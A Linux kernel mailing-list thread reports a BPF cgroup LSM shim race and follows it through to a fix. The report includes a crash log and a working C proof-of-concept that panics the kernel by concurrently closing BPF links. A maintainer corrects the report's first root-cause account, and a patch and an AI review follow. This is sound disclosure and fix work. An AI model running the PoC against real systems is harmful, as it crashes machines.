bpf: Race condition in bpf_trampoline_unlink_cgroup_shim during concurrent cgroup LSM link release

13 views

Skip to first unread message

梅开彦

unread,

Nov 25, 2025, 6:14:42 AM11/25/25

to b...@vger.kernel.org, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org

Our fuzzer discovered a race condition vulnerability in the BPF subsystem, specifically in the release path for cgroup-attached LSM programs. When multiple BPF cgroup links attached to the same LSM hook are released concurrently, a race condition in `bpf_trampoline_unlink_cgroup_shim` can lead to state corruption, triggering a kernel warning (`ODEBUG bug in __init_work`) and a subsequent kernel panic.

Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>

## Vulnerability Description

The vulnerability is triggered when multiple threads concurrently close file descriptors corresponding to `bpf_cgroup_link`s that share a common underlying `bpf_shim_tramp_link`. The `bpf_link_put` function, which is called during the release path, is not designed to handle concurrent calls on the same link instance when its reference count is low. This race leads to the re-initialization of an already-active `work_struct`, a memory state corruption that is detected by the kernel's debug objects feature.

## Root Cause

1. **Shared `shim_link`**: When BPF LSM programs are attached to a cgroup for a specific LSM hook, the kernel may create a single, shared `bpf_shim_tramp_link` (herein `shim_link`) for that hook. This `shim_link` is reference-counted. If multiple `bpf_cgroup_link`s are created for this same hook (e.g., by attaching the same program to different cgroups), they all share and hold a reference to this `shim_link`.

2. **Concurrent Release**: When these `bpf_cgroup_link`s are released concurrently (e.g., by `close()`-ing their file descriptors from multiple threads), the release handler for each link, `bpf_cgroup_link_release`, is invoked. This in turn calls `bpf_trampoline_unlink_cgroup_shim`.

3. **Race Condition**: The `bpf_trampoline_unlink_cgroup_shim` function looks up the shared `shim_link` and calls `bpf_link_put()` on it. The problem is that this function lacks proper locking to serialize the find-and-put operation on the shared `shim_link`.

4. **State Corruption**: `bpf_link_put()` is not designed to be called concurrently on the same link instance when its reference count is about to drop to zero. The race allows two threads to enter a critical section where both might evaluate the reference count and one proceeds to call `INIT_WORK()` on the link's `work_struct` while it's already been scheduled by the other thread, leading to the `ODEBUG bug in __init_work` warning and subsequent panic. This indicates a corruption of the internal state of the `shim_link` object.

## Reproduction Steps

The vulnerability is reproduced by the PoC we provide below. Its logic is as follows:

1. **Load Program**: A minimal BPF LSM program is loaded into the kernel.
2. **Create Shared State**: The PoC attaches this single BPF program to **two different** cgroups. This creates two independent `bpf_cgroup_link`s (and their file descriptors), but crucially, they both share a single underlying `shim_link` object, whose reference count becomes 2.
3. **Trigger Race**: The PoC creates two threads. Each thread is passed one of the two link file descriptors. The threads then attempt to `close()` the descriptors concurrently.
4. **Amplify Probability**: To ensure the small race window is hit, the attach-and-concurrently-close process is repeated in a tight loop (`NUM_ITERATIONS` times).

This repeated, concurrent invocation of the release path reliably triggers the race condition in `bpf_trampoline_unlink_cgroup_shim`.

## Crash Report

```
.------------[ cut here ]------------
[ 79.070173][ T9925] ------------[ cut here ]------------
[ 79.070435][ T9925] ODEBUG: init active (active state 0) object: ffff888029de8d28 object type: work_struct hint: bpf_link0
[ 79.071026][ T9925] WARNING: lib/debugobjects.c:612 at debug_print_object+0x1a2/0x2b0, CPU#0: poc/9925
[ 79.071410][ T9925] Modules linked in:
[ 79.071587][ T9925] CPU: 0 UID: 0 PID: 9925 Comm: poc Not tainted 6.18.0-rc5-next-20251111 #6 PREEMPT(full)
[ 79.071995][ T9925] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 79.072360][ T9925] RIP: 0010:debug_print_object+0x1a2/0x2b0
[ 79.072599][ T9925] Code: fc ff df 48 89 fa 48 c1 ea 03 80 3c 02 00 75 54 41 56 48 8b 14 dd a0 93 d1 8b 4c 89 e6 48 c7 c7d
[ 79.073371][ T9925] RSP: 0018:ffffc90007d2fb38 EFLAGS: 00010286
[ 79.073620][ T9925] RAX: 0000000000000000 RBX: 0000000000000003 RCX: ffffffff817b20de
[ 79.073949][ T9925] RDX: ffff88802304be00 RSI: ffffffff817b20eb RDI: 0000000000000001
[ 79.074269][ T9925] RBP: 0000000000000001 R08: 0000000000000001 R09: ffffed100c484851
[ 79.074588][ T9925] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffff8bd18e80
[ 79.074906][ T9925] R13: ffffffff8b6c6080 R14: ffffffff81d36450 R15: ffffc90007d2fbf8
[ 79.075226][ T9925] FS: 00007f2e4303b6c0(0000) GS:ffff8880cda4e000(0000) knlGS:0000000000000000
[ 79.075586][ T9925] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 79.075853][ T9925] CR2: 00007f2e42839f78 CR3: 000000010f55c000 CR4: 0000000000752ef0
[ 79.076177][ T9925] PKRU: 55555554
[ 79.076324][ T9925] Call Trace:
[ 79.076460][ T9925] <TASK>
[ 79.076581][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.076823][ T9925] __debug_object_init+0x229/0x390
[ 79.077312][ T9925] ? __pfx___debug_object_init+0x10/0x10
[ 79.077551][ T9925] ? bpf_lsm_find_cgroup_shim+0xfe/0x3a0
[ 79.077787][ T9925] __init_work+0x51/0x60
[ 79.077967][ T9925] ? __cgroup_bpf_run_lsm_socket+0x9e1/0xa40
[ 79.078211][ T9925] bpf_link_put+0x54/0x180
[ 79.078395][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.078660][ T9925] bpf_trampoline_unlink_cgroup_shim+0x1f2/0x2f0
[ 79.078926][ T9925] ? __pfx_bpf_trampoline_unlink_cgroup_shim+0x10/0x10
[ 79.079204][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.079467][ T9925] ? __pfx_radix_tree_delete_item+0x10/0x10
[ 79.079710][ T9925] ? find_held_lock+0x2b/0x80
[ 79.079907][ T9925] ? __pfx_bpf_link_release+0x10/0x10
[ 79.080131][ T9925] bpf_cgroup_link_release.part.0+0x382/0x4b0
[ 79.080371][ T9925] bpf_cgroup_link_release+0x41/0x50
[ 79.080587][ T9925] bpf_link_free+0xf0/0x390
[ 79.080775][ T9925] bpf_link_release+0x61/0x80
[ 79.080972][ T9925] __fput+0x407/0xb50
[ 79.081142][ T9925] fput_close_sync+0x114/0x210
[ 79.081340][ T9925] ? __pfx_fput_close_sync+0x10/0x10
[ 79.081555][ T9925] ? dnotify_flush+0x7e/0x4c0
[ 79.081754][ T9925] __x64_sys_close+0x93/0x120
[ 79.081953][ T9925] do_syscall_64+0xcb/0xfa0
[ 79.082144][ T9925] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 79.082386][ T9925] RIP: 0033:0x7f2e431379ca
[ 79.082568][ T9925] Code: 48 3d 00 f0 ff ff 77 48 c3 0f 1f 80 00 00 00 00 48 83 ec 18 89 7c 24 0c e8 63 ce f8 ff 8b 7c 244
[ 79.083335][ T9925] RSP: 002b:00007f2e4303ae90 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
[ 79.083672][ T9925] RAX: ffffffffffffffda RBX: 00007f2e4303b6c0 RCX: 00007f2e431379ca
[ 79.083990][ T9925] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000007
[ 79.084309][ T9925] RBP: 00007f2e4303aed0 R08: 0000000000000000 R09: 00007fff74a263a7
[ 79.084626][ T9925] R10: 0000000000000008 R11: 0000000000000293 R12: ffffffffffffff80
[ 79.084943][ T9925] R13: 0000000000000000 R14: 00007fff74a262b0 R15: 00007f2e4283b000
[ 79.085269][ T9925] </TASK>
[ 79.085395][ T9925] Kernel panic - not syncing: kernel: panic_on_warn set ...
[ 79.085685][ T9925] CPU: 0 UID: 0 PID: 9925 Comm: poc Not tainted 6.18.0-rc5-next-20251111 #6 PREEMPT(full)
[ 79.086084][ T9925] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 79.086446][ T9925] Call Trace:
[ 79.086581][ T9925] <TASK>
[ 79.086702][ T9925] dump_stack_lvl+0x3d/0x1b0
[ 79.086892][ T9925] vpanic+0x67e/0x710
[ 79.087060][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.087273][ T9925] panic+0xc7/0xd0
[ 79.087428][ T9925] ? __pfx_panic+0x10/0x10
[ 79.087616][ T9925] ? check_panic_on_warn+0x24/0xc0
[ 79.087827][ T9925] check_panic_on_warn+0xb6/0xc0
[ 79.088036][ T9925] __warn+0x10d/0x3f0
[ 79.088201][ T9925] ? __wake_up_klogd.part.0+0x9e/0x100
[ 79.088426][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.088642][ T9925] report_bug+0x2e1/0x500
[ 79.088822][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.089040][ T9925] handle_bug+0x2dd/0x410
[ 79.089222][ T9925] exc_invalid_op+0x35/0x80
[ 79.089412][ T9925] asm_exc_invalid_op+0x1a/0x20
[ 79.089614][ T9925] RIP: 0010:debug_print_object+0x1a2/0x2b0
[ 79.089854][ T9925] Code: fc ff df 48 89 fa 48 c1 ea 03 80 3c 02 00 75 54 41 56 48 8b 14 dd a0 93 d1 8b 4c 89 e6 48 c7 c7d
[ 79.090618][ T9925] RSP: 0018:ffffc90007d2fb38 EFLAGS: 00010286
[ 79.090865][ T9925] RAX: 0000000000000000 RBX: 0000000000000003 RCX: ffffffff817b20de
[ 79.091183][ T9925] RDX: ffff88802304be00 RSI: ffffffff817b20eb RDI: 0000000000000001
[ 79.091500][ T9925] RBP: 0000000000000001 R08: 0000000000000001 R09: ffffed100c484851
[ 79.091818][ T9925] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffff8bd18e80
[ 79.092137][ T9925] R13: ffffffff8b6c6080 R14: ffffffff81d36450 R15: ffffc90007d2fbf8
[ 79.092455][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.092695][ T9925] ? __warn_printk+0x17e/0x310
[ 79.092892][ T9925] ? __warn_printk+0x18b/0x310
[ 79.093092][ T9925] ? debug_print_object+0x1a1/0x2b0
[ 79.093307][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.093549][ T9925] __debug_object_init+0x229/0x390
[ 79.093762][ T9925] ? __pfx___debug_object_init+0x10/0x10
[ 79.094001][ T9925] ? bpf_lsm_find_cgroup_shim+0xfe/0x3a0
[ 79.094235][ T9925] __init_work+0x51/0x60
[ 79.094410][ T9925] ? __cgroup_bpf_run_lsm_socket+0x9e1/0xa40
[ 79.094653][ T9925] bpf_link_put+0x54/0x180
[ 79.094837][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.095100][ T9925] bpf_trampoline_unlink_cgroup_shim+0x1f2/0x2f0
[ 79.095358][ T9925] ? __pfx_bpf_trampoline_unlink_cgroup_shim+0x10/0x10
[ 79.095636][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.095897][ T9925] ? __pfx_radix_tree_delete_item+0x10/0x10
[ 79.096144][ T9925] ? find_held_lock+0x2b/0x80
[ 79.096340][ T9925] ? __pfx_bpf_link_release+0x10/0x10
[ 79.096562][ T9925] bpf_cgroup_link_release.part.0+0x382/0x4b0
[ 79.096816][ T9925] bpf_cgroup_link_release+0x41/0x50
[ 79.097035][ T9925] bpf_link_free+0xf0/0x390
[ 79.097224][ T9925] bpf_link_release+0x61/0x80
[ 79.097420][ T9925] __fput+0x407/0xb50
[ 79.097590][ T9925] fput_close_sync+0x114/0x210
[ 79.097787][ T9925] ? __pfx_fput_close_sync+0x10/0x10
[ 79.098007][ T9925] ? dnotify_flush+0x7e/0x4c0
[ 79.098207][ T9925] __x64_sys_close+0x93/0x120
[ 79.098404][ T9925] do_syscall_64+0xcb/0xfa0
[ 79.098593][ T9925] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 79.098834][ T9925] RIP: 0033:0x7f2e431379ca
[ 79.099016][ T9925] Code: 48 3d 00 f0 ff ff 77 48 c3 0f 1f 80 00 00 00 00 48 83 ec 18 89 7c 24 0c e8 63 ce f8 ff 8b 7c 244
[ 79.099781][ T9925] RSP: 002b:00007f2e4303ae90 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
[ 79.100120][ T9925] RAX: ffffffffffffffda RBX: 00007f2e4303b6c0 RCX: 00007f2e431379ca
[ 79.100440][ T9925] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000007
[ 79.100757][ T9925] RBP: 00007f2e4303aed0 R08: 0000000000000000 R09: 00007fff74a263a7
[ 79.101077][ T9925] R10: 0000000000000008 R11: 0000000000000293 R12: ffffffffffffff80
[ 79.101394][ T9925] R13: 0000000000000000 R14: 00007fff74a262b0 R15: 00007f2e4283b000
[ 79.101719][ T9925] </TASK>
[ 79.102160][ T9925] Kernel Offset: disabled
```

## Proof of Concept

The following C program can demonstrate the vulnerability on linux-next-20251111(commit 2666975a8905776d306bee01c5d98a0395bda1c9).

To successfully run the PoC, you need to obtain the BTF ID for `bpf_lsm_socket_create` and set the definition `ATTACH_BTF_ID_socket_create` to this value. You can retrieve this BTF ID using the following command: `bpftool btf dump file path-to-your-vmlinux | grep bpf_lsm_socket_create`.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <sys/resource.h>
#include <pthread.h>

#define CGROUP1_PATH "/tmp/cgroup_poc_1"
#define CGROUP2_PATH "/tmp/cgroup_poc_2"
#define LOG_BUF_SIZE 65536
#define NUM_ITERATIONS 1000 // Increased loop count to improve hit probability

// ============================================================================
// Important: This BTF ID is kernel version specific.
// You must find the correct ID for your kernel and update the value below.
// ============================================================================
#define ATTACH_BTF_ID_socket_create 198174

// Wrapper for bpf() system call
static long bpf(int cmd, union bpf_attr *attr, unsigned int size) {
return syscall(__NR_bpf, cmd, attr, size);
}

// Simple BPF program: int func() { return 0; }
struct bpf_insn bpf_prog_insns[] = {
{ .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 },
{ .code = BPF_JMP | BPF_EXIT },
};

// Helper function to create cgroup v2 directory
static int setup_cgroup(const char *path) {
if (mkdir(path, 0755) && errno != EEXIST) {
perror("mkdir cgroup path");
return -1;
}
if (mount("none", path, "cgroup2", 0, NULL)) {
if (errno != EBUSY && errno != EINVAL) {
fprintf(stderr, "Warning: could not mount cgroup2 at %s: %s\n",
path, strerror(errno));
}
}
return open(path, O_RDONLY | O_DIRECTORY);
}

// Thread worker function to close file descriptor
void *close_worker(void *arg) {
long fd = (long)arg;
if (close(fd) != 0) {
// Under high concurrency, this may fail due to race conditions, which can be ignored
}
return NULL;
}

int main(void) {
union bpf_attr prog_attr = {}, link_attr = {};
int cgroup_fd1, cgroup_fd2, prog_fd;
char bpf_log_buf[LOG_BUF_SIZE] = {0};

struct rlimit rlim = {RLIM_INFINITY, RLIM_INFINITY};
if (setrlimit(RLIMIT_MEMLOCK, &rlim)) {
perror("setrlimit(RLIMIT_MEMLOCK)");
return 1;
}

printf("Setting up cgroups...\n");
cgroup_fd1 = setup_cgroup(CGROUP1_PATH);
if (cgroup_fd1 < 0) return 1;
cgroup_fd2 = setup_cgroup(CGROUP2_PATH);
if (cgroup_fd2 < 0) return 1;

// 1. Load BPF program (only needs to be loaded once)
prog_attr.prog_type = BPF_PROG_TYPE_LSM;
prog_attr.expected_attach_type = BPF_LSM_CGROUP;
prog_attr.insn_cnt = sizeof(bpf_prog_insns) / sizeof(struct bpf_insn);
prog_attr.insns = (uint64_t)bpf_prog_insns;
prog_attr.license = (uint64_t)"GPL";
prog_attr.attach_btf_id = ATTACH_BTF_ID_socket_create;
prog_attr.log_buf = (uint64_t)bpf_log_buf;
prog_attr.log_size = LOG_BUF_SIZE;
prog_attr.log_level = 1;

printf("Loading BPF program...\n");
prog_fd = bpf(BPF_PROG_LOAD, &prog_attr, sizeof(prog_attr));
if (prog_fd < 0) {
fprintf(stderr, "Error: BPF_PROG_LOAD failed: %s\n", strerror(errno));
fprintf(stderr, "------ Verifier Log ------\n%s\n------------------------\n", bpf_log_buf);
goto cleanup_cgroups;
}

printf("Starting %d iterations to trigger the race condition...\n", NUM_ITERATIONS);
for (int i = 0; i < NUM_ITERATIONS; i++) {
if (i % 100 == 0) printf("Iteration %d...\n", i);

link_attr.link_create.prog_fd = prog_fd;
link_attr.link_create.attach_type = BPF_LSM_CGROUP;

// 2. Repeatedly attach program to two cgroups in loop
link_attr.link_create.target_fd = cgroup_fd1;
int link_fd1 = bpf(BPF_LINK_CREATE, &link_attr, sizeof(link_attr));
if (link_fd1 < 0) {
perror("BPF_LINK_CREATE for cgroup 1 failed");
continue; // Continue to next iteration
}

link_attr.link_create.target_fd = cgroup_fd2;
int link_fd2 = bpf(BPF_LINK_CREATE, &link_attr, sizeof(link_attr));
if (link_fd2 < 0) {
perror("BPF_LINK_CREATE for cgroup 2 failed");
close(link_fd1);
continue; // Continue to next iteration
}

// 3. Concurrent close of two links to attempt triggering race condition
pthread_t th1, th2;
pthread_create(&th1, NULL, close_worker, (void *)(long)link_fd1);
pthread_create(&th2, NULL, close_worker, (void *)(long)link_fd2);

pthread_join(th1, NULL);
pthread_join(th2, NULL);
}

printf("\nPoC finished. Please check kernel logs (`dmesg`).\n");

close(prog_fd);
close(cgroup_fd1);
close(cgroup_fd2);
return 0;

cleanup_cgroups:
close(cgroup_fd1);
close(cgroup_fd2);
return 1;
}
```

## Kernel Configuration Requirements for Reproduction

The vulnerability can be triggered with the kernel config in the attachment.

config-20251111

Martin KaFai Lau

unread,

Dec 1, 2025, 3:22:32 PM12/1/25

to 梅开彦, Stanislav Fomichev, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org

On 11/25/25 3:14 AM, 梅开彦 wrote:
> Our fuzzer discovered a race condition vulnerability in the BPF subsystem, specifically in the release path for cgroup-attached LSM programs. When multiple BPF cgroup links attached to the same LSM hook are released concurrently, a race condition in `bpf_trampoline_unlink_cgroup_shim` can lead to state corruption, triggering a kernel warning (`ODEBUG bug in __init_work`) and a subsequent kernel panic.
>
> Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
> Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
> Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>
>
> ## Vulnerability Description
>
> The vulnerability is triggered when multiple threads concurrently close file descriptors corresponding to `bpf_cgroup_link`s that share a common underlying `bpf_shim_tramp_link`. The `bpf_link_put` function, which is called during the release path, is not designed to handle concurrent calls on the same link instance when its reference count is low. This race leads to the re-initialization of an already-active `work_struct`, a memory state corruption that is detected by the kernel's debug objects feature.

I don't think concurrent bpf_link_put(same_link) is the issue.
bpf_link_put uses an atomic link->refcnt to handle this situation.

The race should be between the bpf_link_put() in
bpf_trampoline_unlink_cgroup_shim() and the cgroup_shim_find() in
bpf_trampoline_link_cgroup_shim(). The cgroup_shim_find() in
bpf_trampoline_link_cgroup_shim() gets a shim_link with a refcnt 0, then
a UAF.

The changes in commit ab5d47bd41b1 ("bpf: Remove in_atomic() from
bpf_link_put().") made this bug easier to manifest as in the reproducer
because the bpf_trampoline_unlink_prog() is always delayed.

A potential fix is to check the link->refcnt in
bpf_trampoline_unlink_cgroup_shim() and call
bpf_trampoline_unlink_prog() when needed inside the
mutex_lock(&tr->mutex). Cc: Stanislav

梅开彦

unread,

Dec 1, 2025, 11:49:28 PM12/1/25

to martin kafai lau, stanislav fomichev, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org

> -----原始邮件-----
> 发件人: "Martin KaFai Lau" <marti...@linux.dev>
> 发送时间: 2025-12-02 04:21:57 (星期二)
> 收件人: "梅开彦" <kai...@hust.edu.cn>, "Stanislav Fomichev" <s...@fomichev.me>
> 抄送: dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org
> 主题: Re: bpf: Race condition in bpf_trampoline_unlink_cgroup_shim during concurrent cgroup LSM link release

Thank you for the correction and analysis。
This is super helpful for our subsequent work!

xulang

unread,

Feb 6, 2026, 2:14:33 AM (2 days ago) Feb 6

to marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xulang

Based on Martin KaFai Lau's suggestions, I have created a simple patch.

The root cause of this bug is that when `bpf_link_put` reduces the
refcount of `shim_link->link.link` to zero, the resource is considered
released but may still be referenced via `tr->progs_hlist` in
`cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
`bpf_shim_tramp_link_release` is deferred. During this window, another
process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.

To fix this:
1. Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.
Only increment the refcount if it is not already zero.
2. Guard the freeing of `shim_link` with `tr->mutex` to prevent release
while the mutex is held.

Testing:
I used a non-rigorous method to verify the fix by adding a delay in
`bpf_link_put` to make the bug easier to trigger:

void bpf_link_put(struct bpf_link *link)
{
if (!atomic64_dec_and_test(&link->refcnt))
return;
+ msleep(100);
INIT_WORK(&link->work, bpf_link_put_deferred);
schedule_work(&link->work);
}

Before the patch, running a PoC easily reproduced the crash (often within
dozens of iterations) with a call trace similar to KaiyanM's report.
After the patch, the bug no longer occurs even after millions of
iterations.

Signed-off-by: xulang <xul...@uniontech.com>
---
kernel/bpf/trampoline.c | 14 ++++++++++----
1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
index 976d89011b15..c16a53cca5e0 100644
--- a/kernel/bpf/trampoline.c
+++ b/kernel/bpf/trampoline.c
@@ -702,15 +702,23 @@ static void bpf_shim_tramp_link_release(struct bpf_link *link)
return;

WARN_ON_ONCE(bpf_trampoline_unlink_prog(&shim_link->link, shim_link->trampoline, NULL));
- bpf_trampoline_put(shim_link->trampoline);
}

static void bpf_shim_tramp_link_dealloc(struct bpf_link *link)
{
struct bpf_shim_tramp_link *shim_link =
container_of(link, struct bpf_shim_tramp_link, link.link);
+ struct bpf_trampoline *tr = shim_link->trampoline;

+ if (!tr) {
+ kfree(shim_link);
+ return;
+ }
+
+ mutex_lock(&tr->mutex);
kfree(shim_link);
+ mutex_unlock(&tr->mutex);
+ bpf_trampoline_put(tr);
}

static const struct bpf_link_ops bpf_shim_tramp_link_lops = {
@@ -800,10 +808,8 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
mutex_lock(&tr->mutex);

shim_link = cgroup_shim_find(tr, bpf_func);
- if (shim_link) {
+ if (shim_link && atomic64_inc_not_zero(&shim_link->link.link.refcnt)) {
/* Reusing existing shim attached by the other program. */
- bpf_link_inc(&shim_link->link.link);
-
mutex_unlock(&tr->mutex);
bpf_trampoline_put(tr); /* bpf_trampoline_get above */
return 0;
--
2.50.1

bot+b...@kernel.org

unread,

Feb 6, 2026, 2:50:48 AM (2 days ago) Feb 6

to xul...@uniontech.com, marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xul...@uniontech.com, and...@kernel.org, marti...@kernel.org, edd...@gmail.com, yongho...@linux.dev, c...@meta.com, ihor.s...@linux.dev

commit 55b1614b50eb05449d35281100cacc591d1aca3a
Author: xulang <xul...@uniontech.com>

bpf: fix: Race condition in bpf_trampoline_unlink_cgroup_shim

This commit fixes a use-after-free race in the BPF cgroup shim handling.
When bpf_link_put() reduces the refcount to zero but before the deferred
cleanup runs, another thread can find the shim via cgroup_shim_find() and
attempt to increment its refcount. The fix uses atomic64_inc_not_zero()
to detect and handle this race.

This commit appears to fix a bug introduced by commit 69fd337a975c
("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call that
could resurrect a zero-refcount link. Should this patch include a Fixes:
tag?

Suggested:
Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")

---
AI reviewed your patch. Please fix the bug or email reply why it's not a bug.
See: https://github.com/kernel-patches/vmtest/blob/master/ci/claude/README.md

CI run summary: https://github.com/kernel-patches/bpf/actions/runs/21742563414

AI-authorship-score: medium
AI-authorship-explanation: The commit message uses markdown-style formatting (backticks) and has a structured, verbose explanatory style that is atypical of kernel patches, though the technical content is sound.
issues-found: 1
issue-severity-score: low
issue-severity-explanation: Missing Fixes: tag for a major bug fix; the fix itself is technically correct.

Reply all

Reply to author

Forward

0 new messages